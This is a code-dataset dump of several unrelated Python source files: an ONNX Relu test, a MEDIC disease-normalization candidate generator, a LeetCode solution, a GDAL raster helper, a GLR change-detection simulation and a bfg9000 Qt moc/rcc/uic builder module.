seq_id string | text string | repo_name string | sub_path string | file_name string | file_ext string | file_size_in_byte int64 | program_lang string | lang string | doc_type string | stars int64 | dataset string | pt string | api list |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
33654948642 | import unittest
from onnx import defs, helper
from onnx.onnx_pb2 import NodeProto
class TestRelu(unittest.TestCase):
def test_relu(self):
self.assertTrue(defs.has('Relu'))
node_def = helper.make_node(
'Relu', ['X'], ['Y'])
if __name__ == '__main__':
unittest.main()
| tianyaoZhang/myONNX | onnx/test/relu_test.py | relu_test.py | py | 307 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "unittest.TestCase",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "onnx.defs.has",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "onnx.defs",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "onnx.helper.make_node",... |
73527120745 | '''
candidate generation: writes a pickle file of candidates
'''
import sys
import nltk
import numpy as np
from ncbi_normalization import load, sample
from ncbi_normalization.parse_MEDIC_dictionary import concept_obj
from normalize import dump_data, load_data, load_mentions
from gensim.models import KeyedVectors
def prepare_embedding_vocab(filename, binary = True, limit = 1000000):
'''filename: '~/disease-normalization/data/embeddings/wvec_50_haodi-li-et-al.bin'
1. Use gensim for reading in embedding model
2. Sort based on the index to make sure that they are in the correct order
3. Normalize the vectors
4. Build vocabulary mappings, zero for padding
5. Create an inverse dictionary
'''
vector_model = KeyedVectors.load_word2vec_format(filename, binary = binary, limit = limit)
#vector_model=KeyedVectors.load_word2vec_format(config['embedding']['emb_file'], binary=True, limit=50000)
words = [k for k,v in sorted(vector_model.vocab.items(),key = lambda x:x[1].index)]
vector_model.init_sims(replace = True)
vocabulary={"<SPECIAL>": 0, "<OOV>": 1}
for word in words:
vocabulary.setdefault(word, len(vocabulary))
inversed_vocabulary={value:key for key, value in vocabulary.items()}
return vector_model, vocabulary, inversed_vocabulary
def load_pretrained_word_embeddings(vocab,embedding_model):
"""vocab: vocabulary from data vectorizer
embedding_model: model loaded with gensim"""
pretrained_embeddings = np.random.uniform(low=-0.05, high=0.05, size=(len(vocab)-1,embedding_model.vectors.shape[1]))
pretrained_embeddings = np.vstack((np.zeros(shape=(1,embedding_model.vectors.shape[1])), pretrained_embeddings))
found=0
for word,idx in vocab.items():
if word in embedding_model.vocab:
pretrained_embeddings[idx]=embedding_model.get_vector(word)
found+=1
print("Found pretrained vectors for {found} words.".format(found=found))
return pretrained_embeddings
def load_concepts(dict_file,order):
'''
dict_file: directory to the tsv file of MEDIC dictionary
dictionary.loaded format:
dictionary of entries, key = canonical id, value = named tuple in the form of
MEDIC_ENTRY(DiseaseID='MESH:D005671', DiseaseName='Fused Teeth',
AllDiseaseIDs=('MESH:D005671',), AllNames=('Fused Teeth', 'Teeth, Fused')
'''
# MEDIC dictionary
dictionary = load.Terminology()
dictionary.loaded = load.load(dict_file,'MEDIC')
concept = concept_obj(dictionary,order=order)
concept.names = [name.lower() for name in concept.names]
return concept, dictionary
def span_to_sum_of_w2v(spans,vocabulary,pretrained):
'''
represent all spans by sum of w2v
'''
embeddings = []
for span in spans:
tokenized = nltk.word_tokenize(span.lower())
index = [vocabulary.get(token,1) for token in tokenized]
#emb = np.mean(np.array([pretrained[i] for i in index]), axis=0)
emb = np.sum(np.array([pretrained[i] for i in index]), axis=0)
embeddings.append(emb)
embeddings = np.array(embeddings)
return embeddings
def cosine_similarity_candidates(mention_spans,concept_spans,emb_path,n_cossim):
'''
yields list of list of candidates
n_cossim = number of candidates for each mention
'''
# prepare embeddings
vector_model, vocabulary, inversed_vocabulary = prepare_embedding_vocab(emb_path, binary = True)
pretrained = load_pretrained_word_embeddings(vocabulary, vector_model)
# vector representations
mention_embeddings = span_to_sum_of_w2v(mention_spans,vocabulary,pretrained)
concept_embeddings = span_to_sum_of_w2v(concept_spans,vocabulary,pretrained)
from sklearn.preprocessing import normalize
concept_embeddings = normalize(concept_embeddings)
mention_embeddings = normalize(mention_embeddings)
dot_product_matrix = np.dot(mention_embeddings,np.transpose(concept_embeddings))
dot_product_matrix = dot_product_matrix.tolist()
candidate_indices = [np.argpartition(np.array(mention_candidates),-n_cossim)[-n_cossim:].tolist() for mention_candidates in dot_product_matrix]
return candidate_indices
def jaccard_distance_candidates(mention_spans,concept_spans,n_jaccard):
candidate_indices = []
for mention in mention_spans:
distances = [nltk.jaccard_distance(set(mention),set(concept)) for concept in concept_spans]
indices = np.argpartition(np.array(distances),-n_jaccard)[-n_jaccard:].tolist()
candidate_indices.append(indices)
return candidate_indices
if __name__ == "__main__":
'''
1. prepare concept spans & mention spans
2. get the candidates based on cosine similarity
3. get the candidates based on Jaccard distance
4. prepare (start, end, span), gold standard
'''
dict_file = 'data/CTD_diseases.tsv'
dev_file = 'data/NCBIdevelopset_corpus.txt'
emb_path = 'data/wvec_50_haodi-li-et-al.bin'
n_cossim = sys.argv[1]
n_jaccard = sys.argv[2]
save_to = 'data/selected_max200.pickle'
# (1)
# concepts
[potato0,potato1,concept_order,potato2,potato3,potato4] = load_data('data/sampled_dev_set.pickle')
del potato0, potato1, potato2, potato3, potato4
concept, dictionary = load_concepts(dict_file,concept_order)
# mentions
corpus_dev = load_mentions(dev_file,'dev corpus')
# (2)
cossim_candidate_indices = cosine_similarity_candidates(corpus_dev.names,concept.names,emb_path,n_cossim)
# (3)
jaccard_candidate_indices = jaccard_distance_candidates(corpus_dev.names,concept.names,n_jaccard)
# (4)
assert len(cossim_candidate_indices)==len(jaccard_candidate_indices)
candidates = []
for cossim,jaccard in zip(cossim_candidate_indices,jaccard_candidate_indices):
mention_candidates = sorted(list(set(cossim+jaccard)))
candidates.append(mention_candidates)
positives_training, positives_dev, positives_dev_truncated = load_data('data/gitig_positive_indices.pickle')
del positives_training, positives_dev_truncated
positives_dev = sample.prepare_positives(positives_dev,nltk.word_tokenize,vocabulary)
can_val_data = sample.NewDataSet('dev corpus')
can_val_data.y = []
can_val_data.mentions = []
start = 0
for cans, poss, span in zip(candidates,positives_dev,corpus_dev.names):
end = start + len(cans)
(chosen_idx, idces), e_token_indices = poss
can_val_data.y.extend([1 if can in idces else 0 for can in cans])
can_val_data.mentions.append((start,end,span))
start = end
assert len(can_val_data.mentions)==len(candidates)
data = [candidates, can_val_data.mentions, can_val_data.y]
dump_data(save_to,data)
| fshdnc/nor-bert | src/candidate_generation.py | candidate_generation.py | py | 6,793 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "gensim.models.KeyedVectors.load_word2vec_format",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "gensim.models.KeyedVectors",
"line_number": 26,
"usage_type": "name"
},
{
"api_name": "numpy.random.uniform",
"line_number": 39,
"usage_type": "call"... |
18252621901 | from typing import List
class Solution:
def minStartValue1(self, nums: List[int]) -> int:
n = len(nums)
m = 100
left = 1
right = m * n + 1
while left < right:
middle = (left + right) // 2
total = middle
is_valid = True
for num in nums:
total += num
if total < 1:
is_valid = False
break
if is_valid:
right = middle
else:
left = middle + 1
return left
def minStartValue2(self, nums: List[int]) -> int:
min_val = 0
total = 0
for num in nums:
total += num
min_val = min(min_val, total)
return -min_val + 1
solution = Solution()
nums = [-3,2,-3,4,2]
assert solution.minStartValue1(nums) == 5, "Should be 5"
assert solution.minStartValue2(nums) == 5, "Should be 5"
| hujienan/Jet-Algorithm | leetcode/1413. Minimum Value to Get Positive Step by Step Sum/index.py | index.py | py | 951 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "typing.List",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "typing.List",
"line_number": 25,
"usage_type": "name"
}
] |
72300794345 | import sys
from osgeo import gdal, osr
class GDALUtilities:
"""
This class has the following capabilities
1. Get raster info
2. Read image band as an array
3. Reproject a raster
"""
def __init__(self, path):
self.path = path
def get_raster_info(self):
self.dataset = gdal.Open(self.path, gdal.GA_ReadOnly)
print(
"Driver: {}/{}\n".format(
self.dataset.GetDriver().ShortName, self.dataset.GetDriver().LongName
)
)
print(
"Size is {} x {} x {}\n".format(
self.dataset.RasterXSize, self.dataset.RasterYSize, self.dataset.RasterCount
)
)
print("Projection is {}\n".format(self.dataset.GetProjection()))
geotransform = self.dataset.GetGeoTransform()
if geotransform:
print("Origin = ({}, {})\n".format(geotransform[0], geotransform[3]))
print("Pixel Size = ({}, {})\n".format(geotransform[1], geotransform[5]))
band_count = self.dataset.RasterCount
for i in range(1, band_count + 1):
band = self.dataset.GetRasterBand(i)
band_name = band.GetDescription()
if band_name:
print(f"Band {i} Name: {band_name}")
else:
print(f"Band {i} has no name.")
dataset = None
def read_image(self, band: int = None):
self.dataset = gdal.Open(self.path, gdal.GA_ReadOnly)
band = self.dataset.GetRasterBand(band)
data = band.ReadAsArray()
self.dataset = None
return data
def reproject(
self, output_path: str = None, target_crs: str = None # EPSG:4326
):
self.dataset = gdal.Open(self.path, gdal.GA_ReadOnly)
input_dataset = self.dataset
input_srs = input_dataset.GetProjectionRef()
target_srs = osr.SpatialReference()
target_srs.SetFromUserInput(target_crs)
output_dataset = gdal.Warp(
output_path, input_dataset, dstSRS=target_srs.ExportToWkt()
)
input_dataset = None
output_dataset = None | manojappalla/RSGIS-Tutorials | gdal_tutorials/gdal_utilities.py | gdal_utilities.py | py | 2,135 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "osgeo.gdal.Open",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "osgeo.gdal",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "osgeo.gdal.GA_ReadOnly",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "osgeo.gdal.Ope... |
20761353624 | import math
import numpy as np
import statistics
import random
import time
import matplotlib.pyplot as plt
h = 40
limit_number_of_taken_values = 200
nb_of_initial_values = 100
nb_of_Dthet = 100
Dthets = [(i * 1 / nb_of_Dthet) for i in range(nb_of_Dthet)] # thet step for ARL function
# sigs = [(0.5 + i/nb_of_sensors) for i in range(nb_of_sensors)]
# sigs = [2 for i in range(nb_of_sensors)]
sigs = [0.1, 0.5, 1.5]
nb_of_sensors = len(sigs)
def time_before_detection_step_signal(sigs, Dthet, nb_of_iteration, probas=[1] * len(sigs), h=h):
n= len(sigs)
nb_of_values = []
for p in range(nb_of_iteration):
#random.shuffle(sigs)
X_bar = [] # somme y_i -mu_0 / sigma i
nb_of_initial_values =random.randint(200, 200 + n )
for i in range(nb_of_initial_values):
sig = sigs[i % n]
p = random.random()
if p<probas[i % n]:
x = np.random.normal(0, sig)
m = len(X_bar)
for j in range(m):
X_bar[j] = X_bar[j] + x / sig
X_bar.append(x)
# print(reception_error)
# time.sleep(1)
detected = False
i = nb_of_initial_values
while detected is False:
sig = sigs[i % n]
p = random.random()
if p < probas[i % n]:
x = np.random.normal(Dthet, sig)
"""m = len(X_bar)
if m >= limit_number_of_taken_values:
X_bar = X_bar[1:]
m -= 1"""
for j in range(m):
X_bar[j] = X_bar[j] + x / sig
# print((reception_error[j] * (n-j))**2)
X_bar.append(x)
for j in range(m + 1):
if (abs(X_bar[j]) / math.sqrt(m - j + 1) > h):
detected = True
# print(X_bar)
# print(j)
i += 1
nb_of_values.append(i - nb_of_initial_values)
return statistics.mean(nb_of_values), statistics.stdev(nb_of_values), nb_of_values
def necessary_nb_of_value_GSC(sig, Dthet, h):
return math.pow(h * sig / Dthet, 2)
def average_nb_of_necessary_values_before_detection(sig, Dthet, nb_of_iteration):
nb_of_values = []
for p in range(nb_of_iteration):
i = 1
X_bar = [np.random.normal(0, sig)]
mean = statistics.mean(X_bar)
while (mean + (h * sig / math.sqrt(i)) > Dthet):
X_bar.append(np.random.normal(0, sig))
mean = statistics.mean(X_bar)
i += 1
nb_of_values.append(i)
return statistics.mean(nb_of_values)
"""
def plot_theoritical_ARL():
nb_of_Dthet = 100
Dthets = [(0.5 + (i * 2.5 / nb_of_Dthet)) for i in range(1, nb_of_Dthet)]
mean = []
for Dthet in Dthets:
mean.append(necessary_nb_of_value_GSC(sig, Dthet))
stri = ''
for i in range(len(Dthets)):
stri += '(' + str(Dthets[i]) + ',' + str(mean[i]) + ')'
print(stri)
def plot_ARL():
sig = 1
std = []
mean = []
expected = []
h = 10
nb_of_iteration = 1000
Dthet = 0.8
pas = 0.1
Dthets = []
while Dthet < 2:
Dthets.append(Dthet)
a, b = time_before_detection_step_signal([sig], Dthet, int(nb_of_iteration), h)
mean.append(a)
std.append(2.567 * b / math.sqrt(nb_of_iteration))
expected.append(necessary_nb_of_value_GSC(sig, Dthet, h))
# print("ok")
Dthet += pas
pas *= 1.1
nb_of_iteration *= 0.9
stri = ''
stri += '(' + str(Dthets[-1]) + ',' + str((mean[-1] - expected[-1]) * 100 / mean[-1]) + ') +- (0,)'
print(stri)
stri = ''
for i in range(len(Dthets)):
stri += '(' + str(Dthets[i]) + ',' + str((mean[i] - expected[i]) * 100 / mean[i]) + ')'
print(stri)
stri = ''
for i in range(len(Dthets)):
stri += '(' + str(Dthets[i]) + ',' + str(mean[i]) + ')'
print(stri)
stri = ''
for i in range(len(Dthets)):
stri += '(' + str(Dthets[i]) + ',' + str(expected[i]) + ')'
print(stri)
def time_before_detection_linear_signal(sig, slope, nb_of_iteration, h=h):
nb_of_values = []
for p in range(nb_of_iteration):
X_bar = []
for i in range(nb_of_initial_values):
x = np.random.normal(0, sig)
n = len(X_bar)
for j in range(n):
X_bar[j] = X_bar[j] * (n - j) / (n - j + 1) + x / (n - j + 1)
X_bar.append(x)
i = 0
detected = False
while detected is False:
i += 1
x = np.random.normal(slope * i, sig)
n = len(X_bar)
if n >= limit_number_of_taken_values:
X_bar = X_bar[1:]
n -= 1
for j in range(n):
X_bar[j] = X_bar[j] * (n - j) / (n - j + 1) + x / (n - j + 1)
X_bar.append(x)
for j in range(n + 1):
if (abs(X_bar[j]) > h * sig / math.sqrt(n + 1 - j)):
detected = True
# print(X_bar)
# print(j)
nb_of_values.append(i)
nb_of_values.append(i)
return statistics.mean(nb_of_values), statistics.stdev(nb_of_values)
def plot_LGAARL():
std = []
mean = []
nb_of_iteration = 80000
Dthet = 0.0
pas = 0.0005
Dthets = []
while Dthet < 0.4:
Dthets.append(Dthet)
a, b = time_before_detection_linear_signal(1, Dthet, int(nb_of_iteration))
mean.append(a)
std.append(2.567 * b / math.sqrt(nb_of_iteration))
# print("ok")
Dthet += pas
pas *= 1.1
nb_of_iteration *= 0.9
stri = '(' + str(Dthets[-1]) + ',' + str(mean[-1]) + ') +- (0,' + str(std[-1]) + ')'
print(stri)
stri = ''
for i in range(len(Dthets)):
stri += '(' + str(Dthets[i]) + ',' + str(mean[i]) + ') +- (0,' + str(std[i]) + ')'
print(stri)
"""
def main_1(Dthet):
means = []
stds = []
# Dthet = 1
nb_of_iteration = 10000
#h = 10
sigs = [1, 1.5, 2]
nb_of_sensors = len(sigs)
for sig in sigs:
mean, std,z = time_before_detection_step_signal([sig], Dthet, int(nb_of_iteration / math.sqrt(len(sigs))))
means.append(mean)
stds.append(std / math.sqrt(nb_of_iteration / math.sqrt(len(sigs))))
q = 0
for sig in sigs:
q += math.pow(1 / sig, 2)
mean_adapted_one_by_one = 0
std_adapted_one_by_one = 0
i = 0
for sig in sigs:
mean_adapted_one_by_one += math.pow(1 / (q * math.pow(sig, 2)), 2) * means[i]
std_adapted_one_by_one += stds[i] ** 2 * (1 / (q * math.pow(sig, 2))) ** 2
i += 1
mean_adapted_one_by_one *= len(sigs)
std_adapted_one_by_one = math.sqrt(std_adapted_one_by_one)
std_one_by_one = 0
mean_one_by_one = 0
i = 0
for sig in sigs:
std_one_by_one += stds[i] ** 2
mean_one_by_one += means[i] / math.pow(len(sigs), 2)
i += 1
std_one_by_one = math.sqrt(std_one_by_one) / nb_of_sensors
mean_one_by_one *= len(sigs)
q = 0
for m in means:
q += 1 / m
opti = 0
for m in means:
opti += math.pow(1 / (q * m), 2) * m
opti *= len(sigs)
mean, std, z = time_before_detection_step_signal(sigs, Dthet, nb_of_iteration)
"""
print("one by one")
print(mean_one_by_one)
print(2.567 * std_one_by_one)
print("adapted one by one")
print(mean_adapted_one_by_one)
print(2.567 * std_adapted_one_by_one)
print("simultaneously")
print(mean)
print(2.567 * std / math.sqrt(nb_of_iteration))
"""
return mean, 2.567 * std / math.sqrt(
nb_of_iteration), mean_one_by_one, 2.567 * std_one_by_one, mean_adapted_one_by_one, 2.567 * std_adapted_one_by_one, opti
def main_2():
Dthets = [1 + i * 2 / 10 for i in range(0, 10)]
mean_simul = []
std_simul = []
mean_one_one = []
std_one_one = []
mean_adapted = []
std_adapted = []
mean_opti = []
for Dthet in Dthets:
a, b, c, d, e, f, g = main_1(Dthet)
mean_simul.append(a)
std_simul.append(b)
mean_one_one.append(c)
std_one_one.append(d)
mean_adapted.append(e)
std_adapted.append(f)
mean_opti.append(g)
moyenne = 0
for i in range(len(Dthets)):
moyenne += abs((mean_adapted[i] - mean_opti[i]) / mean_opti[i])
plt.plot(Dthets, mean_simul, label='S0 round robin')
plt.plot(Dthets, mean_one_one, label='S1 un par un un')
plt.plot(Dthets, mean_adapted, label='S2 un par un période modifiée')
plt.plot(Dthets, mean_opti, label="S Opt optimum global pour les stratégies un par un")
lower_boundary = []
upper_boundary = []
for i in range(len(Dthets)):
lower_boundary.append(mean_simul[i] - std_simul[i])
upper_boundary.append(mean_simul[i] + std_simul[i])
plt.fill_between(Dthets, lower_boundary, upper_boundary, color='#D3D3D3')
lower_boundary = []
upper_boundary = []
for i in range(len(Dthets)):
lower_boundary.append(mean_one_one[i] - std_one_one[i])
upper_boundary.append(mean_one_one[i] + std_one_one[i])
plt.fill_between(Dthets, lower_boundary, upper_boundary, color='#D3D3D3')
lower_boundary = []
upper_boundary = []
for i in range(len(Dthets)):
lower_boundary.append(mean_adapted[i] - std_adapted[i])
upper_boundary.append(mean_adapted[i] + std_adapted[i])
plt.fill_between(Dthets, lower_boundary, upper_boundary, color='#D3D3D3', label='99% confiance intervalle')
plt.legend()
plt.xlabel("amplitude du changement à detecter")
plt.ylabel("temps moyen avant de lever une alerte de detection de changement")
plt.title("comparaisons de stratégies d'émission pour des problèmes de detection en utilisant la méthode GLR")
plt.show()
def main_3():
Dthet = 1
sigs = [0.1, 0.5, 1.5]
nb_of_iteration = 1000
##### fst approach, nested one
sigmas = [sigs[0],sigs[1]]
for i in range (5):
sigmas.append(sigs[2])
sigmas.append(sigs[1])
for i in range (5):
sigmas.append(sigs[2])
sigmas.append(sigs[1])
for i in range(5):
sigmas.append(sigs[2])
sigmas.append(sigs[1])
for i in range(5):
sigmas.append(sigs[2])
mean = time_before_detection_step_signal(sigmas, Dthet, nb_of_iteration, h=h)
print(mean)
sigs_lengths = 500
means = []
stds = []
for i in range(int(nb_of_iteration/100)):
sigmas = []
for j in range(sigs_lengths):
p = random.random()
if p < 0.04:
sigmas.append(sigs[0])
elif p < 0.2:
sigmas.append(sigs[1])
else:
sigmas.append(sigs[2])
mean = time_before_detection_step_signal(sigmas, Dthet, 100, h=h)
means.append(mean[0])
stds.append(mean[1])
print(statistics.mean(means))
print(statistics.mean(stds))
def comparison_of_different_scheduling(nb_of_first,nb_of_second,sigma_first, sigma_second, first_proba, second_proba, nb_of_cases):
infos = []
for i in range(nb_of_first):
infos.append([sigma_first,first_proba])
for i in range(nb_of_second):
infos.append([sigma_second, second_proba])
nb_of_iteration = 1000
h = 40
Dthet = 0.5
means = []
stds = []
for i in range(nb_of_cases):
random.shuffle(infos)
sigmas = []
probas = []
for elt in infos:
sigmas.append(elt[0])
probas.append(elt[1])
mean, std, z = time_before_detection_step_signal(sigmas, Dthet, nb_of_iteration,probas, h)
means.append(mean)
stds.append(std/math.sqrt(nb_of_iteration))
means = sorted(means)
n = len(means)
to_print = ""
tot = 0
for elt in means:
tot += 1/n
to_print += "(" + str(elt) +"," + str(tot) + ') '
print(to_print)
def comparison_of_two_opposite_schedulings(nb_of_first,nb_of_second,sigma_first, sigma_second, first_proba, second_proba):
nb_of_iteration = 50000
h = 40
Dthet = 1
#### construction of the strategy where in the first time it is always the fisrt cat, then after the second cat..
infos = []
for i in range(nb_of_first):
infos.append([sigma_first, first_proba])
for i in range(nb_of_second):
infos.append([sigma_second, second_proba])
sigmas = []
probas = []
for elt in infos:
sigmas.append(elt[0])
probas.append(elt[1])
mean, std, nb_of_value_before_detection = time_before_detection_step_signal(sigmas, Dthet, nb_of_iteration, probas, h)
print(mean)
nb_of_value_before_detection = sorted(nb_of_value_before_detection)
values = []
nb_of_items = []
values.append(nb_of_value_before_detection.pop(0))
nb_of_items.append(1)
for elt in nb_of_value_before_detection:
if elt ==values[-1]:
nb_of_items[-1] += 1
else:
values.append(elt)
nb_of_items.append(1)
n = len(nb_of_value_before_detection)
to_print = ""
tot = 0
for elt in zip(values, nb_of_items):
tot += elt[1] / n
to_print += "(" + str(elt[0]) + "," + str(tot) + ') '
print(to_print)
pgcd = math.gcd(nb_of_first, nb_of_second)
infos = []
for i in range(int(nb_of_first/pgcd)):
infos.append([sigma_first,first_proba])
for i in range(int(nb_of_second/pgcd)):
infos.append([sigma_second, second_proba])
sigmas = []
probas = []
for elt in infos:
sigmas.append(elt[0])
probas.append(elt[1])
mean, std, nb_of_value_before_detection = time_before_detection_step_signal(sigmas, Dthet, nb_of_iteration, probas,
h)
print(mean)
nb_of_value_before_detection = sorted(nb_of_value_before_detection)
values = []
nb_of_items = []
values.append(nb_of_value_before_detection.pop(0))
nb_of_items.append(1)
for elt in nb_of_value_before_detection:
if elt == values[-1]:
nb_of_items[-1] += 1
else:
values.append(elt)
nb_of_items.append(1)
n = len(nb_of_value_before_detection)
to_print = ""
tot = 0
for elt in zip(values, nb_of_items):
tot += elt[1] / n
to_print += "(" + str(elt[0]) + "," + str(tot) + ') '
print(to_print)
def plot_CDF_of_one_random_solution(nb_of_first,nb_of_second,sigma_first, sigma_second, first_proba, second_proba):
Dthet = 0.5
nb_of_iteration = 10000
h = 40
infos = []
for i in range(nb_of_first):
infos.append([sigma_first, first_proba])
for i in range(nb_of_second):
infos.append([sigma_second, second_proba])
random.shuffle(infos)
sigmas = []
probas = []
for elt in infos:
sigmas.append(elt[0])
probas.append(elt[1])
mean, std, nb_of_value_before_detection = time_before_detection_step_signal(sigmas, Dthet, nb_of_iteration, probas, h)
print(mean)
nb_of_value_before_detection = sorted(nb_of_value_before_detection)
values = []
nb_of_items = []
values.append(nb_of_value_before_detection.pop(0))
nb_of_items.append(1)
for elt in nb_of_value_before_detection:
if elt == values[-1]:
nb_of_items[-1] += 1
else:
values.append(elt)
nb_of_items.append(1)
n = len(nb_of_value_before_detection)
to_print = ""
tot = 0
for elt in zip(values, nb_of_items):
tot += elt[1] / n
to_print += "(" + str(elt[0]) + "," + str(tot) + ') '
print(to_print)
def test():
values = []
for i in range(100000):
values.append(np.random.normal(0,0.1)/0.1)
values = sorted(values)
plt.plot(values)
plt.show()
values = []
for i in range(100000):
values.append(np.random.normal(0, 1))
values = sorted(values)
plt.plot(values)
plt.show()
def function_of_the_performance_according_to_the_error_noise():
Dthet = 1
nb_of_iteration = 10000
h = 40
sigs = [i/10 + 0.1 for i in range(20)]
perfs = []
for sig in sigs:
mean, std, values = time_before_detection_step_signal([sig], Dthet, nb_of_iteration, probas=[1] * len(sigs), h=h)
perfs.append(mean)
plt.plot(sigs,perfs)
plt.show()
if __name__ == "__main__":
# quantify_false_positives(sigs)
# for sig in sigs:
# a, b = time_before_detection_step_signal(sig, 3, 10000, h=10)
# print("########")
# print(sig)
# print(a)
# plot_LGAARL()
#main_3()
"""nb_of_first = 50
nb_of_second = 50
sigma_first = 0.1
sigma_second = 0.1
first_proba = 1
second_proba = 1
nb_of_cases = 2
comparison_of_different_scheduling(nb_of_first, nb_of_second, sigma_first, sigma_second, first_proba, second_proba, nb_of_cases)
"""
function_of_the_performance_according_to_the_error_noise()
#comparison_of_two_opposite_schedulings(nb_of_first, nb_of_second, sigma_first, sigma_second, first_proba, second_proba)
#plot_CDF_of_one_random_solution(nb_of_first, nb_of_second, sigma_first, sigma_second, first_proba, second_proba)
| gwenmaudet/PhD_main | detection_step_signal/GLR.py | GLR.py | py | 17,337 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "random.randint",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "random.random",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "numpy.random.normal",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"... |
24390096374 | from itertools import chain
from . import builder
from .. import options as opts, safe_str, shell
from .common import Builder, choose_builder, SimpleBuildCommand
from ..file_types import HeaderFile, SourceFile
from ..iterutils import iterate
from ..languages import known_langs
from ..path import Path
from ..versioning import detect_version
# Set the source language to C++, since we want to be able to use the C++
# language definition to infer whether a file passed to `moc` is a source or
# header file based on its extension.
with known_langs.make('qtmoc', src_lang='c++') as x:
x.vars(compiler='MOC', flags='MOCFLAGS')
with known_langs.make('qrc') as x:
x.vars(compiler='RCC', flags='RCCFLAGS')
x.exts(source=['.qrc'])
with known_langs.make('qtui') as x:
x.vars(compiler='UIC', flags='UICFLAGS')
x.exts(source=['.ui'])
@builder('qtmoc')
def moc_builder(env):
return choose_builder(env, known_langs['qtmoc'], (MocBuilder,),
default_candidates=['moc'])
class MocBuilder(Builder):
def __init__(self, env, langinfo, command, found, version_output):
super().__init__(langinfo.name, *self._parse_brand(version_output))
name = langinfo.var('compiler').lower()
mocflags_name = langinfo.var('flags').lower()
mocflags = shell.split(env.getvar(langinfo.var('flags'), ''))
self.transpiler = MocCompiler(
self, env, command=(name, command, found),
flags=(mocflags_name, mocflags)
)
@staticmethod
def _parse_brand(version_output):
if 'moc' in version_output:
return 'qt', detect_version(version_output)
return 'unknown', None
@staticmethod
def check_command(env, command):
return env.execute(command + ['--version'], stdout=shell.Mode.pipe,
stderr=shell.Mode.devnull)
class MocCompiler(SimpleBuildCommand):
@property
def deps_flavor(self):
return None
def _call(self, cmd, input, output, flags=None):
return list(chain(
cmd, iterate(flags), [input, '-o', output]
))
def default_name(self, input, step):
if isinstance(input, SourceFile):
return input.path.stripext('.moc').suffix
base, leaf = input.path.stripext(
known_langs['c++'].default_ext('source')
).splitleaf()
return base.append('moc_' + leaf).suffix
def output_file(self, name, step):
return SourceFile(Path(name), 'c++')
def flags(self, options, global_options=None, output=None, mode='normal'):
flags = []
for i in options:
if isinstance(i, opts.include_dir):
flags.append('-I' + i.directory.path)
elif isinstance(i, opts.define):
if i.value:
flags.append('-D' + i.name + '=' + i.value)
else:
flags.append('-D' + i.name)
elif isinstance(i, opts.warning):
for j in i.value:
if j == opts.WarningValue.disable:
flags.append('--no-warnings')
else:
raise ValueError('unsupported warning level {!r}'
.format(j))
elif isinstance(i, safe_str.stringy_types):
flags.append(i)
else:
raise TypeError('unknown option type {!r}'.format(type(i)))
return flags
@builder('qrc')
def qrc_builder(env):
return choose_builder(env, known_langs['qrc'], (RccBuilder,),
default_candidates=['rcc'])
class RccBuilder(Builder):
def __init__(self, env, langinfo, command, found, version_output):
super().__init__(langinfo.name, *self._parse_brand(version_output))
name = langinfo.var('compiler').lower()
rccflags_name = langinfo.var('flags').lower()
rccflags = shell.split(env.getvar(langinfo.var('flags'), ''))
self.transpiler = RccCompiler(
self, env, command=(name, command, found),
flags=(rccflags_name, rccflags)
)
@staticmethod
def _parse_brand(version_output):
if 'rcc' in version_output:
return 'qt', detect_version(version_output)
return 'unknown', None
@staticmethod
def check_command(env, command):
return env.execute(command + ['--version'], stdout=shell.Mode.pipe,
stderr=shell.Mode.devnull)
class RccCompiler(SimpleBuildCommand):
@property
def deps_flavor(self):
return 'gcc'
def _call(self, cmd, input, output, deps=None, flags=None):
result = list(chain(cmd, iterate(flags), [input, '-o', output]))
if deps:
return self.env.tool('rccdep')(result, deps)
return result
def default_name(self, input, step):
return input.path.stripext(
known_langs['c++'].default_ext('source')
).suffix
def output_file(self, name, step):
return SourceFile(Path(name), 'c++')
def flags(self, options, global_options=None, output=None, mode='normal'):
flags = []
for i in options:
if isinstance(i, safe_str.stringy_types):
flags.append(i)
else:
raise TypeError('unknown option type {!r}'.format(type(i)))
return flags
@builder('qtui')
def qtui_builder(env):
return choose_builder(env, known_langs['qtui'], (UicBuilder,),
default_candidates=['uic'])
class UicBuilder(Builder):
def __init__(self, env, langinfo, command, found, version_output):
super().__init__(langinfo.name, *self._parse_brand(version_output))
name = langinfo.var('compiler').lower()
uicflags_name = langinfo.var('flags').lower()
uicflags = shell.split(env.getvar(langinfo.var('flags'), ''))
self.transpiler = UicCompiler(
self, env, command=(name, command, found),
flags=(uicflags_name, uicflags)
)
@staticmethod
def _parse_brand(version_output):
if 'uic' in version_output:
return 'qt', detect_version(version_output)
return 'unknown', None
@staticmethod
def check_command(env, command):
return env.execute(command + ['--version'], stdout=shell.Mode.pipe,
stderr=shell.Mode.devnull)
class UicCompiler(SimpleBuildCommand):
@property
def deps_flavor(self):
return None
def _call(self, cmd, input, output, flags=None):
return list(chain(
cmd, iterate(flags), [input, '-o', output]
))
def default_name(self, input, step):
base, leaf = input.path.stripext('.h').splitleaf()
return base.append('ui_' + leaf).suffix
def output_file(self, name, step):
return HeaderFile(Path(name), 'c++')
def flags(self, options, global_options=None, output=None, mode='normal'):
flags = []
for i in options:
if isinstance(i, safe_str.stringy_types):
flags.append(i)
else:
raise TypeError('unknown option type {!r}'.format(type(i)))
return flags
| jimporter/bfg9000 | bfg9000/tools/qt.py | qt.py | py | 7,250 | python | en | code | 73 | github-code | 36 | [
{
"api_name": "languages.known_langs.make",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "languages.known_langs",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "languages.known_langs.make",
"line_number": 18,
"usage_type": "call"
},
{
"api_n... |
38164677251 | import math
